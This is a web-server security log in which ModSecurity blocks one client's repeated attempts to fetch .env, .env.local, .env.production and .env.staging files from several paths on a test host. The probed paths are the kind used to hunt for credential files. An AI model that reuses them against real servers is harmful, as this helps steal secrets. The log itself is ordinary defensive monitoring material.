[Wed Jan 07 03:48:56.221517 2026] [:error] [pid 1248392] [client 45.148.10.159:49778] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aV3JmBbsuCSf9NTQ9s_0VAAAAAM"]
[Wed Jan 07 03:48:56.221733 2026] [:error] [pid 1248392] [client 45.148.10.159:49778] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aV3JmBbsuCSf9NTQ9s_0VAAAAAM"]
[Wed Jan 07 03:48:56.221890 2026] [:error] [pid 1248392] [client 45.148.10.159:49778] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aV3JmBbsuCSf9NTQ9s_0VAAAAAM"]
[Wed Jan 07 03:48:56.260815 2026] [authz_core:error] [pid 1248392] [client 45.148.10.159:49778] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Wed Jan 07 03:48:56.304473 2026] [authz_core:error] [pid 1248392] [client 45.148.10.159:49778] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Wed Jan 07 03:49:00.331604 2026] [:error] [pid 1248390] [client 45.148.10.159:46422] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aV3JnMEIxEbNfU6y2MWMoAAAAAE"]
[Wed Jan 07 03:49:00.331848 2026] [:error] [pid 1248390] [client 45.148.10.159:46422] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aV3JnMEIxEbNfU6y2MWMoAAAAAE"]
[Wed Jan 07 03:49:00.332022 2026] [:error] [pid 1248390] [client 45.148.10.159:46422] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aV3JnMEIxEbNfU6y2MWMoAAAAAE"]
[Wed Jan 07 03:49:11.261932 2026] [:error] [pid 1248394] [client 45.148.10.159:58818] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aV3JpyKP3LfiSmVjqw0tOQAAAAU"]
[Wed Jan 07 03:49:11.262168 2026] [:error] [pid 1248394] [client 45.148.10.159:58818] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aV3JpyKP3LfiSmVjqw0tOQAAAAU"]
[Wed Jan 07 03:49:11.262325 2026] [:error] [pid 1248394] [client 45.148.10.159:58818] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aV3JpyKP3LfiSmVjqw0tOQAAAAU"]
[Wed Jan 07 03:49:15.902929 2026] [:error] [pid 1248394] [client 45.148.10.159:58818] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aV3JqyKP3LfiSmVjqw0tOgAAAAU"]
[Wed Jan 07 03:49:15.903151 2026] [:error] [pid 1248394] [client 45.148.10.159:58818] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aV3JqyKP3LfiSmVjqw0tOgAAAAU"]
[Wed Jan 07 03:49:15.903334 2026] [:error] [pid 1248394] [client 45.148.10.159:58818] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aV3JqyKP3LfiSmVjqw0tOgAAAAU"]
[Wed Jan 07 03:49:21.058730 2026] [:error] [pid 1248393] [client 45.148.10.159:58550] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aV3JsReYWvWJmu8YY0xpQQAAAAQ"]
[Wed Jan 07 03:49:21.058952 2026] [:error] [pid 1248393] [client 45.148.10.159:58550] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aV3JsReYWvWJmu8YY0xpQQAAAAQ"]
[Wed Jan 07 03:49:21.059117 2026] [:error] [pid 1248393] [client 45.148.10.159:58550] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aV3JsReYWvWJmu8YY0xpQQAAAAQ"]
[Wed Jan 07 03:49:29.341326 2026] [:error] [pid 1248391] [client 45.148.10.159:58564] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aV3JuTNvD-ZISLd-2fIwtAAAAAI"]
[Wed Jan 07 03:49:29.341550 2026] [:error] [pid 1248391] [client 45.148.10.159:58564] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aV3JuTNvD-ZISLd-2fIwtAAAAAI"]
[Wed Jan 07 03:49:29.341712 2026] [:error] [pid 1248391] [client 45.148.10.159:58564] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aV3JuTNvD-ZISLd-2fIwtAAAAAI"]
[Wed Jan 07 03:49:31.752971 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aV3Ju4CwIwNwLd1B0jiSkQAAAAY"]
[Wed Jan 07 03:49:31.753205 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aV3Ju4CwIwNwLd1B0jiSkQAAAAY"]
[Wed Jan 07 03:49:31.753833 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aV3Ju4CwIwNwLd1B0jiSkQAAAAY"]
[Wed Jan 07 03:49:31.799853 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aV3Ju4CwIwNwLd1B0jiSkgAAAAY"]
[Wed Jan 07 03:49:31.800056 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aV3Ju4CwIwNwLd1B0jiSkgAAAAY"]
[Wed Jan 07 03:49:31.800192 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aV3Ju4CwIwNwLd1B0jiSkgAAAAY"]
[Wed Jan 07 03:49:32.191297 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aV3JvICwIwNwLd1B0jiSmQAAAAY"]
[Wed Jan 07 03:49:32.191475 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aV3JvICwIwNwLd1B0jiSmQAAAAY"]
[Wed Jan 07 03:49:32.191614 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aV3JvICwIwNwLd1B0jiSmQAAAAY"]
[Wed Jan 07 03:49:32.442422 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aV3JvICwIwNwLd1B0jiSmgAAAAY"]
[Wed Jan 07 03:49:32.442647 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aV3JvICwIwNwLd1B0jiSmgAAAAY"]
[Wed Jan 07 03:49:32.442841 2026] [:error] [pid 1249055] [client 45.148.10.159:44364] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aV3JvICwIwNwLd1B0jiSmgAAAAY"]
[Wed Jan 07 03:49:40.891559 2026] [:error] [pid 1248390] [client 45.148.10.159:46668] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aV3JxMEIxEbNfU6y2MWMoQAAAAE"]
[Wed Jan 07 03:49:40.891793 2026] [:error] [pid 1248390] [client 45.148.10.159:46668] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aV3JxMEIxEbNfU6y2MWMoQAAAAE"]
[Wed Jan 07 03:49:40.891980 2026] [:error] [pid 1248390] [client 45.148.10.159:46668] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aV3JxMEIxEbNfU6y2MWMoQAAAAE"]
[Wed Jan 07 03:49:54.206029 2026] [:error] [pid 1248394] [client 45.148.10.159:54298] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aV3J0iKP3LfiSmVjqw0tOwAAAAU"]
[Wed Jan 07 03:49:54.206270 2026] [:error] [pid 1248394] [client 45.148.10.159:54298] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aV3J0iKP3LfiSmVjqw0tOwAAAAU"]
[Wed Jan 07 03:49:54.206464 2026] [:error] [pid 1248394] [client 45.148.10.159:54298] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aV3J0iKP3LfiSmVjqw0tOwAAAAU"]
[Wed Jan 07 03:49:59.114540 2026] [:error] [pid 1248393] [client 45.148.10.159:43282] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aV3J1xeYWvWJmu8YY0xpQgAAAAQ"]
[Wed Jan 07 03:49:59.114780 2026] [:error] [pid 1248393] [client 45.148.10.159:43282] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aV3J1xeYWvWJmu8YY0xpQgAAAAQ"]
[Wed Jan 07 03:49:59.114939 2026] [:error] [pid 1248393] [client 45.148.10.159:43282] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aV3J1xeYWvWJmu8YY0xpQgAAAAQ"]
